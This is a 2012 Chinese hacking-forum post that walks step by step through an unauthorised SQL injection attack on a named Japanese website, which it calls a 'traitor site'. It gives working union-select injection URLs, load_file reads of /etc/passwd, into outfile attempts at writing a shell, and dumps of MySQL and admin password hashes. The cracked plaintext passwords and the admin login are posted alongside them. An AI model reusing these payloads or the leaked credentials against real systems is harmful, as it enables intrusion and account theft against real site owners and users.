找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 原创 检测汉奸站全过程
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2996|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
xiancda
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
补:www.zuaa.jp测试

$ q4 R4 g. A& w9 a
) X1 N: o/ ~$ m# r- ~% U0x01. 检测 www.zuaa.jp 收集数据- |" |; |! P6 m3 m- `
/ f( B$ V. h* t( A
: [& D& ^1 V% F" o8 Y2 p
whatweb' n. T2 r3 r& @
  g" K# u; M9 s% B" q

3 G& E) O/ f6 ]: Y利用NMAP扫描
& |+ I' B0 f5 W# M% ^
" M+ r/ F" U* i1 D8 K! c# J中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持+ W9 S2 I6 d: y5 s
0x02.找注入点: ?, x+ T1 i" R: K
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=390; P, W7 X4 [4 {2 G) g( j9 Y
. s) y& [- c+ i. z& Z* e+ E
9 X- V  f" s3 R
0x03.order by
& d* y4 E; p& _! H2 J) I             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
) i- e# [8 J; i, L/ @* b% y0 S7 D& F* }1 O0 x4 E
order by 28报错,order by 27正常* G0 x; F$ x; g2 l, W% S- _: b
) F. S  m: L; b' P! b1 Y
0x04.   union手动查询
7 M. E" D& ~% q$ I& yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27   L2 e8 P3 _4 o) F5 m0 O2 s
添加到 27 时正常显示 8 D$ V) k1 N: j& ]  v

& L- x! s( A; c3 w! U中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持% A3 j- X: t0 i) c- y
8 r( X& X; @5 c* z4 j  W6 ]
0x05. info:+ o% Y' ?/ C! G, E" a
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ; ?5 D4 D0 _8 M- b

# p* ?  q& W. I3 c! k! juser:            root@localhost) G+ o" ^- G; W" ~, v/ l7 Q
database:    openpne4 v& b) L5 @  B: T* x' e& P8 }, l9 Z
version:      4.1.22
& K. t0 i4 {  M  l. `' Cos:             portbld-freebsd5.4
* i7 c  u4 A, W7 o" l9 K! h
: N. Q" U$ t- s0x06. root用户
3 O3 T. e) S, J- c( o5 y利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)6 C0 a! F: W! u# t
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 ' ~8 t8 |3 |( \6 K0 }

6 q; `" R, }* E5 L' i通过工具转换4 \$ h6 W' |! q9 b. [, Z9 ~
" R. r. Y' ]* j7 W
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& h8 N+ V$ Q, Q

; N0 w4 K. k' l2 `' ]* l0x07. 利用 into outfile: u1 ^% [& N- Q7 _8 [0 g
全部都失败$ J" _( h4 P# C" }8 I( f
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php* n; ?  |$ O) [, [
4 |( ~! c/ i& v6 w! p7 ?5 c. h
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
9 k- r3 ^: t! q9 }" _. y5 H+ Q; G/ V/ @# f
页面显示“MDB2 Error:syntax error”
+ m$ ]. c! ~3 V1 J% j# P( x. Q) L
0x08. 利用 mysql 4.1* P. t! h& S; q! U  J, h
猜常规表名,字段未果 工具 sqlmap
1 `! P) N9 ?/ O$ y0 u! R; k( B! S中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ ~( J7 J0 {6 B! E, R% _7 j+ k

6 e9 r4 ^% ]* n3 U; `7 R* {& B$ o0 O: j) h7 f% Y
0x09. 查找后台
  M- I9 \/ n: o+ r  [' e! A! d# \利用 现有的各种 后台工具尝试都不行
1 {& j$ z  H) Y! o8 ?, V/ E) X, s  w* o* d5 H" f# q( l- R: Y6 X
0x10.  MySL外联方法
& r( x+ d5 D& T& I- O( e: ?1 L从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行6 L% |4 c2 X) n7 B+ _4 C  g
可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user
" u' l+ p! c/ F- Rhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
8 b" w  o: w: s" k' k  }  x4 h; H3 R* [" |0 ]! r5 W
这个可以在 www.cmd5.com 解密: g2 z6 Y5 N* n6 _3 h+ I2 a
root:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009- P6 t, ]+ i, M. l- g
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97. T& `3 B5 b9 `0 ]8 M. i- ^
openpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???6 d  y4 R% j( G- H
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???
4 h) E) e) `/ y0 e0 z2 h' Y2 O  z工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知
1 F) J: ^: r9 {9 z! j+ C
, I  c; s9 A3 W5 N7 \* {# ^- h8 \: x4 `6 C. S/ n
0x11. 网站突破! E( C+ E  m9 |6 F- U$ F
发现网站的源程序 openpne, google 下载 openpne 源码
6 v9 ?7 l2 H# h/ _* O( K! u2 y' g% y" m* u: n5 L! n1 s
1 p* [  Q, r1 s" o. x/ ~( A: X
0x12. 默认信息利用$ Y! m* s6 a/ y& v
http://sns.zuaa.jp/?m=admin&a=page_login  n: b* W  c8 h
8 ^$ |0 m, I& @/ r% a+ D/ Q% S( w
表名 (c_admin_user) ,字段名(username,password)
0 _8 {- z% c' ^1 ^2 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user
( h: P' ?* x& D' F! u; v# L5 u" W. _
解密5 \! u1 K4 R" u% O8 v" S
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009) p+ F& M  X* v8 M
zuaajp:c0923ec5857796a393da99905008c176,          zju18977 c  u! e' `  e. \

" Z) g& q( o1 Q5 k# [. L中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
1 v. S: k2 \! P) V4 s$ m- J
$ `9 H4 l- i7 ~$ Q; ^% }0 [1 X0x13. 登录后台: A& d/ B7 _$ z: L9 q
8 \9 f# L$ `' i3 }" |0 F: J

7 U% S6 P+ d& h7 J. y+ q. D, O4 _0 z/ W6 [) `0 Z2 d
0x14. 小结1 ^0 S8 _3 R8 T3 h% S# K% S* s( w
利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
- q7 m- a& J1 {感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点' d( j; D* s/ U# g
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
1 p* Z6 o1 X* @& @* n# }( h5 P- n中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持- _& \0 ~& T0 a8 W' a3 L6 O! i

; {1 c- c. s+ f( Z0 P: _最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!
3 o! y8 |" F. Z

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

荒村狂客
沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表